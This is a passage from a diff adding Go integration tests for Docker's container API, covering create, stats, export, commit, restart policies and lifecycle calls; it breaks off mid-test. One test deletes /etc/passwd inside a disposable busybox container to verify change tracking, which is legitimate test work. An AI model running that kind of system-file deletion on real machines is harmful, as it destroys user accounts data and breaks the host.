+func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) {
+	dockerCmd(c, "run", "busybox", "true")
+
+	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	// empty Labels field triggered this bug, make sense to check for everything
+	// cause even Ports for instance can trigger this bug
+	// better safe than sorry..
+	fields := []string{
+		"Id",
+		"Names",
+		"Image",
+		"Command",
+		"Created",
+		"Ports",
+		"Labels",
+		"Status",
+		"NetworkSettings",
+	}
+
+	// decoding into types.Container do not work since it eventually unmarshal
+	// and empty field to an empty go map, so we just check for a string
+	for _, f := range fields {
+		if !strings.Contains(string(body), f) {
+			c.Fatalf("Field %s is missing and it shouldn't", f)
+		}
+	}
+}
+
+type containerPs struct {
+	Names []string
+	Ports []map[string]interface{}
+}
+
+// regression test for non-empty fields from #13901
+func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) {
+	// Problematic for Windows porting due to networking not yet being passed back
+	testRequires(c, DaemonIsLinux)
+	name := "pstest"
+	port := 80
+	runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port))
+
+	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var resp []containerPs
+	err = json.Unmarshal(body, &resp)
+	c.Assert(err, checker.IsNil)
+
+	var foundContainer *containerPs
+	for _, container := range resp {
+		for _, testName := range container.Names {
+			if "/"+name == testName {
+				foundContainer = &container
+				break
+			}
+		}
+	}
+
+	c.Assert(foundContainer.Ports, checker.HasLen, 1)
+	c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port))
+	_, ok := foundContainer.Ports[0]["PublicPort"]
+	c.Assert(ok, checker.Not(checker.Equals), true)
+	_, ok = foundContainer.Ports[0]["IP"]
+	c.Assert(ok, checker.Not(checker.Equals), true)
+}
+
+func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) {
+	// Not supported on Windows as Windows does not support docker export
+	testRequires(c, DaemonIsLinux)
+	name := "exportcontainer"
+	dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test")
+
+	status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	found := false
+	for tarReader := tar.NewReader(bytes.NewReader(body)); ; {
+		h, err := tarReader.Next()
+		if err != nil && err == io.EOF {
+			break
+		}
+		if h.Name == "test" {
+			found = true
+			break
+		}
+	}
+	c.Assert(found, checker.True, check.Commentf("The created test file has not been found in the exported image"))
+}
+
+func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) {
+	// Not supported on Windows as Windows does not support docker diff (/containers/name/changes)
+	testRequires(c, DaemonIsLinux)
+	name := "changescontainer"
+	dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd")
+
+	status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	changes := []struct {
+		Kind int
+		Path string
+	}{}
+	c.Assert(json.Unmarshal(body, &changes), checker.IsNil, check.Commentf("unable to unmarshal response body"))
+
+	// Check the changelog for removal of /etc/passwd
+	success := false
+	for _, elem := range changes {
+		if elem.Path == "/etc/passwd" && elem.Kind == 2 {
+			success = true
+		}
+	}
+	c.Assert(success, checker.True, check.Commentf("/etc/passwd has been removed but is not present in the diff"))
+}
+
+func (s *DockerSuite) TestGetContainerStats(c *check.C) {
+	var (
+		name = "statscontainer"
+	)
+	runSleepingContainer(c, "--name", name)
+
+	type b struct {
+		status int
+		body   []byte
+		err    error
+	}
+	bc := make(chan b, 1)
+	go func() {
+		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
+		bc <- b{status, body, err}
+	}()
+
+	// allow some time to stream the stats from the container
+	time.Sleep(4 * time.Second)
+	dockerCmd(c, "rm", "-f", name)
+
+	// collect the results from the stats stream or timeout and fail
+	// if the stream was not disconnected.
+	select {
+	case <-time.After(2 * time.Second):
+		c.Fatal("stream was not closed after container was removed")
+	case sr := <-bc:
+		c.Assert(sr.err, checker.IsNil)
+		c.Assert(sr.status, checker.Equals, http.StatusOK)
+
+		dec := json.NewDecoder(bytes.NewBuffer(sr.body))
+		var s *types.Stats
+		// decode only one object from the stream
+		c.Assert(dec.Decode(&s), checker.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) {
+	out, _ := runSleepingContainer(c)
+	id := strings.TrimSpace(out)
+
+	buf := &integration.ChannelBuffer{make(chan []byte, 1)}
+	defer buf.Close()
+
+	_, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+
+	chErr := make(chan error, 1)
+	go func() {
+		_, err = io.Copy(buf, body)
+		chErr <- err
+	}()
+
+	b := make([]byte, 32)
+	// make sure we've got some stats
+	_, err = buf.ReadTimeout(b, 2*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	// Now remove without `-f` and make sure we are still pulling stats
+	_, _, err = dockerCmdWithError("rm", id)
+	c.Assert(err, checker.Not(checker.IsNil), check.Commentf("rm should have failed but didn't"))
+	_, err = buf.ReadTimeout(b, 2*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "rm", "-f", id)
+	c.Assert(<-chErr, checker.IsNil)
+}
+
+// regression test for gh13421
+// previous test was just checking one stat entry so it didn't fail (stats with
+// stream false always return one stat)
+func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) {
+	name := "statscontainer"
+	runSleepingContainer(c, "--name", name)
+
+	type b struct {
+		status int
+		body   []byte
+		err    error
+	}
+	bc := make(chan b, 1)
+	go func() {
+		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
+		bc <- b{status, body, err}
+	}()
+
+	// allow some time to stream the stats from the container
+	time.Sleep(4 * time.Second)
+	dockerCmd(c, "rm", "-f", name)
+
+	// collect the results from the stats stream or timeout and fail
+	// if the stream was not disconnected.
+	select {
+	case <-time.After(2 * time.Second):
+		c.Fatal("stream was not closed after container was removed")
+	case sr := <-bc:
+		c.Assert(sr.err, checker.IsNil)
+		c.Assert(sr.status, checker.Equals, http.StatusOK)
+
+		s := string(sr.body)
+		// count occurrences of "read" of types.Stats
+		if l := strings.Count(s, "read"); l < 2 {
+			c.Fatalf("Expected more than one stat streamed, got %d", l)
+		}
+	}
+}
+
+func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) {
+	name := "statscontainer"
+	runSleepingContainer(c, "--name", name)
+
+	type b struct {
+		status int
+		body   []byte
+		err    error
+	}
+	bc := make(chan b, 1)
+	go func() {
+		status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil)
+		bc <- b{status, body, err}
+	}()
+
+	// allow some time to stream the stats from the container
+	time.Sleep(4 * time.Second)
+	dockerCmd(c, "rm", "-f", name)
+
+	// collect the results from the stats stream or timeout and fail
+	// if the stream was not disconnected.
+	select {
+	case <-time.After(2 * time.Second):
+		c.Fatal("stream was not closed after container was removed")
+	case sr := <-bc:
+		c.Assert(sr.err, checker.IsNil)
+		c.Assert(sr.status, checker.Equals, http.StatusOK)
+
+		s := string(sr.body)
+		// count occurrences of `"read"` of types.Stats
+		c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`)))
+	}
+}
+
+func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) {
+	name := "statscontainer"
+	dockerCmd(c, "create", "--name", name, "busybox", "ps")
+
+	type stats struct {
+		status int
+		err    error
+	}
+	chResp := make(chan stats)
+
+	// We expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine
+	// below we'll check this on a timeout.
+	go func() {
+		resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "")
+		body.Close()
+		chResp <- stats{resp.StatusCode, err}
+	}()
+
+	select {
+	case r := <-chResp:
+		c.Assert(r.err, checker.IsNil)
+		c.Assert(r.status, checker.Equals, http.StatusOK)
+	case <-time.After(10 * time.Second):
+		c.Fatal("timeout waiting for stats response for stopped container")
+	}
+}
+
+func (s *DockerSuite) TestContainerAPIPause(c *check.C) {
+	// Problematic on Windows as Windows does not support pause
+	testRequires(c, DaemonIsLinux)
+	defer unpauseAllContainers()
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30")
+	ContainerID := strings.TrimSpace(out)
+
+	status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	pausedContainers, err := getSliceOfPausedContainers()
+	c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused"))
+
+	if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] {
+		c.Fatalf("there should be one paused container and not %d", len(pausedContainers))
+	}
+
+	status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	pausedContainers, err = getSliceOfPausedContainers()
+	c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused"))
+	c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container."))
+}
+
+func (s *DockerSuite) TestContainerAPITop(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "top")
+	id := strings.TrimSpace(string(out))
+	c.Assert(waitRun(id), checker.IsNil)
+
+	type topResp struct {
+		Titles    []string
+		Processes [][]string
+	}
+	var top topResp
+	status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(json.Unmarshal(b, &top), checker.IsNil)
+	c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles))
+
+	if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" {
+		c.Fatalf("expected `USER` at `Titles[0]` and `COMMAND` at Titles[10]: %v", top.Titles)
+	}
+	c.Assert(top.Processes, checker.HasLen, 2, check.Commentf("expected 2 processes, found %d: %v", len(top.Processes), top.Processes))
+	c.Assert(top.Processes[0][10], checker.Equals, "/bin/sh -c top")
+	c.Assert(top.Processes[1][10], checker.Equals, "top")
+}
+
+func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	out, _ := runSleepingContainer(c, "-d")
+	id := strings.TrimSpace(string(out))
+	c.Assert(waitRun(id), checker.IsNil)
+
+	type topResp struct {
+		Titles    []string
+		Processes [][]string
+	}
+	var top topResp
+	status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(json.Unmarshal(b, &top), checker.IsNil)
+	c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles))
+
+	if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" {
+		c.Fatalf("expected `Name` at `Titles[0]` and `Private Working Set` at Titles[3]: %v", top.Titles)
+	}
+	c.Assert(len(top.Processes), checker.GreaterOrEqualThan, 2, check.Commentf("expected at least 2 processes, found %d: %v", len(top.Processes), top.Processes))
+
+	foundProcess := false
+	expectedProcess := "busybox.exe"
+	for _, process := range top.Processes {
+		if process[0] == expectedProcess {
+			foundProcess = true
+			break
+		}
+	}
+
+	c.Assert(foundProcess, checker.Equals, true, check.Commentf("expected to find %s: %v", expectedProcess, top.Processes))
+}
+
+func (s *DockerSuite) TestContainerAPICommit(c *check.C) {
+	cName := "testapicommit"
+	dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test")
+
+	name := "testcontainerapicommit"
+	status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	type resp struct {
+		ID string
+	}
+	var img resp
+	c.Assert(json.Unmarshal(b, &img), checker.IsNil)
+
+	cmd := inspectField(c, img.ID, "Config.Cmd")
+	c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd))
+
+	// sanity check, make sure the image is what we think it is
+	dockerCmd(c, "run", img.ID, "ls", "/test")
+}
+
+func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) {
+	cName := "testapicommitwithconfig"
+	dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test")
+
+	config := map[string]interface{}{
+		"Labels": map[string]string{"key1": "value1", "key2": "value2"},
+	}
+
+	name := "testcontainerapicommitwithconfig"
+	status, b, err := sockRequest("POST", "/commit?repo="+name+"&container="+cName, config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	type resp struct {
+		ID string
+	}
+	var img resp
+	c.Assert(json.Unmarshal(b, &img), checker.IsNil)
+
+	label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1")
+	c.Assert(label1, checker.Equals, "value1")
+
+	label2 := inspectFieldMap(c, img.ID, "Config.Labels", "key2")
+	c.Assert(label2, checker.Equals, "value2")
+
+	cmd := inspectField(c, img.ID, "Config.Cmd")
+	c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd))
+
+	// sanity check, make sure the image is what we think it is
+	dockerCmd(c, "run", img.ID, "ls", "/test")
+}
+
+func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) {
+	// TODO Windows to Windows CI - Port this test
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image": "busybox",
+		"Cmd":   []string{"/bin/sh", "-c", "echo test"},
+		"PortBindings": map[string]interface{}{
+			"8080/tcp": []map[string]interface{}{
+				{
+					"HostIP":   "",
+					"HostPort": "aa80",
+				},
+			},
+		},
+	}
+
+	jsonData := bytes.NewBuffer(nil)
+	json.NewEncoder(jsonData).Encode(config)
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body))
+}
+
+func (s *DockerSuite) TestContainerAPICreate(c *check.C) {
+	config := map[string]interface{}{
+		"Image": "busybox",
+		"Cmd":   []string{"/bin/sh", "-c", "touch /test && ls /test"},
+	}
+
+	status, b, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	type createResp struct {
+		ID string
+	}
+	var container createResp
+	c.Assert(json.Unmarshal(b, &container), checker.IsNil)
+
+	out, _ := dockerCmd(c, "start", "-a", container.ID)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "/test")
+}
+
+func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) {
+	config := map[string]interface{}{}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+
+	expected := "Config cannot be empty in order to create a container"
+	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+}
+
+func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) {
+	// Container creation must fail if client specified configurations for more than one network
+	config := map[string]interface{}{
+		"Image": "busybox",
+		"NetworkingConfig": networktypes.NetworkingConfig{
+			EndpointsConfig: map[string]*networktypes.EndpointSettings{
+				"net1": {},
+				"net2": {},
+				"net3": {},
+			},
+		},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	msg := getErrorMessage(c, body)
+	// network name order in error message is not deterministic
+	c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints")
+	c.Assert(msg, checker.Contains, "net1")
+	c.Assert(msg, checker.Contains, "net2")
+	c.Assert(msg, checker.Contains, "net3")
+}
+
+func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) {
+	hostName := "test-host"
+	config := map[string]interface{}{
+		"Image":    "busybox",
+		"Hostname": hostName,
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+	c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname"))
+}
+
+func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) {
+	domainName := "test-domain"
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"Domainname": domainName,
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+	c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname"))
+}
+
+func (s *DockerSuite) TestContainerAPICreateBridgeNetworkMode(c *check.C) {
+	// Windows does not support bridge
+	testRequires(c, DaemonIsLinux)
+	UtilCreateNetworkMode(c, "bridge")
+}
+
+func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) {
+	// Windows does not support these network modes
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	UtilCreateNetworkMode(c, "host")
+	UtilCreateNetworkMode(c, "container:web1")
+}
+
+func UtilCreateNetworkMode(c *check.C, networkMode string) {
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"HostConfig": map[string]interface{}{"NetworkMode": networkMode},
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+	c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode"))
+}
+
+func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) {
+	// TODO Windows to Windows CI. The CpuShares part could be ported.
+	testRequires(c, DaemonIsLinux)
+	config := map[string]interface{}{
+		"Image":      "busybox",
+		"CpuShares":  512,
+		"CpusetCpus": "0",
+	}
+
+	status, body, err := sockRequest("POST", "/containers/create", config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	var container containertypes.ContainerCreateCreatedBody
+	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+
+	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var containerJSON types.ContainerJSON
+
+	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+
+	out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares")
+	c.Assert(out, checker.Equals, "512")
+
+	outCpuset := inspectField(c, containerJSON.ID, "HostConfig.CpusetCpus")
+	c.Assert(outCpuset, checker.Equals, "0")
+}
+
+func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) {
+	config := map[string]interface{}{
+		"Image": "busybox",
+	}
+
+	create := func(ct string) (*http.Response, io.ReadCloser, error) {
+		jsonData := bytes.NewBuffer(nil)
+		c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil)
+		return sockRequestRaw("POST", "/containers/create", jsonData, ct)
+	}
+
+	// Try with no content-type
+	res, body, err := create("")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	body.Close()
+
+	// Try with wrong content-type
+	res, body, err = create("application/xml")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	body.Close()
+
+	// now application/json
+	res, body, err = create("application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
+	body.Close()
+}
+
+//Issue 14230. daemon should return 500 for invalid port syntax
+func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) {
+	config := `{
+				  "Image": "busybox",
+				  "HostConfig": {
+					"NetworkMode": "default",
+					"PortBindings": {
+					  "19039;1230": [
+						{}
+					  ]
+					}
+				  }
+				}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b[:]), checker.Contains, "invalid port")
+}
+
+func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C) {
+	config := `{
+		"Image": "busybox",
+		"HostConfig": {
+			"RestartPolicy": {
+				"Name": "something",
+				"MaximumRetryCount": 0
+			}
+		}
+	}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b[:]), checker.Contains, "invalid restart policy")
+}
+
+func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) {
+	config := `{
+		"Image": "busybox",
+		"HostConfig": {
+			"RestartPolicy": {
+				"Name": "always",
+				"MaximumRetryCount": 2
+			}
+		}
+	}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be used with restart policy")
+}
+
+func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C) {
+	config := `{
+		"Image": "busybox",
+		"HostConfig": {
+			"RestartPolicy": {
+				"Name": "on-failure",
+				"MaximumRetryCount": -2
+			}
+		}
+	}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative")
+}
+
+func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C) {
+	config := `{
+		"Image": "busybox",
+		"HostConfig": {
+			"RestartPolicy": {
+				"Name": "on-failure",
+				"MaximumRetryCount": 0
+			}
+		}
+	}`
+
+	res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
+}
+
+// Issue 7941 - test to make sure a "null" in JSON is just ignored.
+// W/o this fix a null in JSON would be parsed into a string var as "null"
+func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) {
+	config := `{
+		"Hostname":"",
+		"Domainname":"",
+		"Memory":0,
+		"MemorySwap":0,
+		"CpuShares":0,
+		"Cpuset":null,
+		"AttachStdin":true,
+		"AttachStdout":true,
+		"AttachStderr":true,
+		"ExposedPorts":{},
+		"Tty":true,
+		"OpenStdin":true,
+		"StdinOnce":true,
+		"Env":[],
+		"Cmd":"ls",
+		"Image":"busybox",
+		"Volumes":{},
+		"WorkingDir":"",
+		"Entrypoint":null,
+		"NetworkDisabled":false,
+		"OnBuild":null}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
+
+	b, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+	type createResp struct {
+		ID string
+	}
+	var container createResp
+	c.Assert(json.Unmarshal(b, &container), checker.IsNil)
+	out := inspectField(c, container.ID, "HostConfig.CpusetCpus")
+	c.Assert(out, checker.Equals, "")
+
+	outMemory := inspectField(c, container.ID, "HostConfig.Memory")
+	c.Assert(outMemory, checker.Equals, "0")
+	outMemorySwap := inspectField(c, container.ID, "HostConfig.MemorySwap")
+	c.Assert(outMemorySwap, checker.Equals, "0")
+}
+
+func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) {
+	// TODO Windows: Port once memory is supported
+	testRequires(c, DaemonIsLinux)
+	config := `{
+		"Image":     "busybox",
+		"Cmd":       "ls",
+		"OpenStdin": true,
+		"CpuShares": 100,
+		"Memory":    524287
+	}`
+
+	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	c.Assert(err, checker.IsNil)
+	b, err2 := readBody(body)
+	c.Assert(err2, checker.IsNil)
+
+	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB")
+}
+
+func (s *DockerSuite) TestContainerAPIRename(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--name", "TestContainerAPIRename", "-d", "busybox", "sh")
+
+	containerID := strings.TrimSpace(out)
+	newName := "TestContainerAPIRenameNew"
+	statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil)
+	c.Assert(err, checker.IsNil)
+	// 204 No Content is expected, not 200
+	c.Assert(statusCode, checker.Equals, http.StatusNoContent)
+
+	name := inspectField(c, containerID, "Name")
+	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container"))
+}
+
+func (s *DockerSuite) TestContainerAPIKill(c *check.C) {
+	name := "test-api-kill"
+	runSleepingContainer(c, "-i", "--name", name)
+
+	status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	state := inspectField(c, name, "State.Running")
+	c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state))
+}
+
+func (s *DockerSuite) TestContainerAPIRestart(c *check.C) {
+	name := "test-api-restart"
+	runSleepingContainer(c, "-di", "--name", name)
+
+	status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(waitInspect(name, "{{ .State.Restarting  }} {{ .State.Running  }}", "false true", 15*time.Second), checker.IsNil)
+}
+
+func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) {
+	name := "test-api-restart-no-timeout-param"
+	out, _ := runSleepingContainer(c, "-di", "--name", name)
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(waitInspect(name, "{{ .State.Restarting  }} {{ .State.Running  }}", "false true", 15*time.Second), checker.IsNil)
+}
+
+func (s *DockerSuite) TestContainerAPIStart(c *check.C) {
+	name := "testing-start"
+	config := map[string]interface{}{
+		"Image":     "busybox",
+		"Cmd":       append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...),
+		"OpenStdin": true,
+	}
+
+	status, _, err := sockRequest("POST", "/containers/create?name="+name, config)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusCreated)
+
+	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNoContent)
+
+	// second call to start should give 304
+	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	c.Assert(err, checker.IsNil)
+
+	// TODO(tibor): figure out why this doesn't work on windows
+	if isLocalDaemon {
+		c.Assert(status, checker.Equals, http.StatusNotModified)
+	}
+}
+
+func (s *DockerSuite) TestContainerAPIStop(c *check.C) {
+	name := "test-api-stop"
+	runSleepingContainer(c, "-i", "--name", name)
+
+	status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil)
+	c.Assert(err, checker.IsNil)
